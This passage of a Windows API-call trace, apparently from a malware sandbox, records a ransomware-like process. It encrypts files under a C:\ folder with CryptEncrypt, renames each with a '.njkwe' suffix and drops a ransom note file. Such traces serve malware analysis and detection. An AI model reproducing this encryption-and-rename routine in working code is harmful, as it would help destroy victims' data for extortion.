lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.554] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.554] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.554] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.554] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.554] CloseHandle (hObject=0x42c) returned 1 [0061.556] GetProcessHeap () returned 0xbe0000 [0061.556] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.556] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.557] GetProcessHeap () returned 0xbe0000 [0061.557] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.557] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.557] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.557] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.557] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.557] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.557] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.557] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 49 [0061.557] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.557] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.557] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.557] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.557] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.557] GetTickCount () returned 0x114fd0e [0061.557] GetTickCount () returned 0x114fd0e [0061.557] GetTickCount () returned 0x114fd0e [0061.557] GetTickCount () returned 0x114fd0e [0061.557] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.558] GetProcessHeap () returned 0xbe0000 [0061.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.558] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.559] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.559] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.559] GetProcessHeap () returned 0xbe0000 [0061.560] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.560] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.560] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.560] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.560] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.560] CloseHandle (hObject=0x42c) returned 1 [0061.561] GetProcessHeap () returned 0xbe0000 [0061.561] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.561] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.561] GetProcessHeap () returned 0xbe0000 [0061.561] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.561] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.561] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0061.562] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.562] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1045\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.562] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.563] CloseHandle (hObject=0x428) returned 1 [0061.563] GetProcessHeap () returned 0xbe0000 [0061.563] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.563] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1046", cAlternateFileName="")) returned 1 [0061.563] lstrcmpiW (lpString1="1046", lpString2="Windows") returned -1 [0061.563] lstrcmpiW (lpString1="1046", lpString2="$Recycle.bin") returned 1 [0061.563] lstrcmpiW (lpString1="1046", lpString2="System Volume Information") returned -1 [0061.563] lstrcmpiW (lpString1="1046", lpString2="Program Files") returned -1 [0061.563] lstrcmpiW (lpString1="1046", lpString2="Program Files (x86)") returned -1 [0061.563] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046") returned 30 [0061.563] lstrcmpW (lpString1="1046", lpString2=".") returned 1 [0061.563] lstrcmpW (lpString1="1046", lpString2="..") returned 1 [0061.563] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.563] GetProcessHeap () returned 0xbe0000 [0061.563] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.563] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\*") returned 32 [0061.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3a0 [0061.644] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.644] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.644] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.644] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.644] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.644] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\.") returned 32 [0061.644] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.644] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.644] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.644] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.644] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.644] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.644] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.644] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\..") returned 33 [0061.644] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.644] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.644] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.644] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.644] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.644] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.644] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.644] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.644] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 39 [0061.644] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.644] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.644] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.644] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.645] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.645] GetTickCount () returned 0x114fd6c [0061.645] GetTickCount () returned 0x114fd6c [0061.645] GetTickCount () returned 0x114fd6c [0061.645] GetTickCount () returned 0x114fd6c [0061.645] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.645] GetProcessHeap () returned 0xbe0000 [0061.645] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.645] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xe63, lpOverlapped=0x0) returned 1 [0061.646] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff19d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.646] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xe63, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xe63, lpOverlapped=0x0) returned 1 [0061.647] GetProcessHeap () returned 0xbe0000 [0061.647] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.647] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.647] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.647] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.647] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.647] CloseHandle (hObject=0x42c) returned 1 [0061.648] GetProcessHeap () returned 0xbe0000 [0061.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.649] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.651] GetProcessHeap () returned 0xbe0000 [0061.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.651] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.651] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.651] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.651] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.651] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.651] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.651] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 48 [0061.651] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.651] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.651] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.651] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.651] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.652] GetTickCount () returned 0x114fd6c [0061.652] GetTickCount () returned 0x114fd6c [0061.652] GetTickCount () returned 0x114fd6c [0061.652] GetTickCount () returned 0x114fd6c [0061.652] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.652] GetProcessHeap () returned 0xbe0000 [0061.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.652] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.654] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.654] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.654] GetProcessHeap () returned 0xbe0000 [0061.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.654] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.654] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.654] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.654] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.655] CloseHandle (hObject=0x42c) returned 1 [0061.657] GetProcessHeap () returned 0xbe0000 [0061.657] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.657] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.657] GetProcessHeap () returned 0xbe0000 [0061.657] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.657] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.657] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.657] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.657] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.657] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.657] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.657] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 49 [0061.657] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.658] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.658] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.658] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.658] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.658] GetTickCount () returned 0x114fd6c [0061.658] GetTickCount () returned 0x114fd6c [0061.658] GetTickCount () returned 0x114fd6c [0061.658] GetTickCount () returned 0x114fd6c [0061.658] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.659] GetProcessHeap () returned 0xbe0000 [0061.659] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.659] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.661] 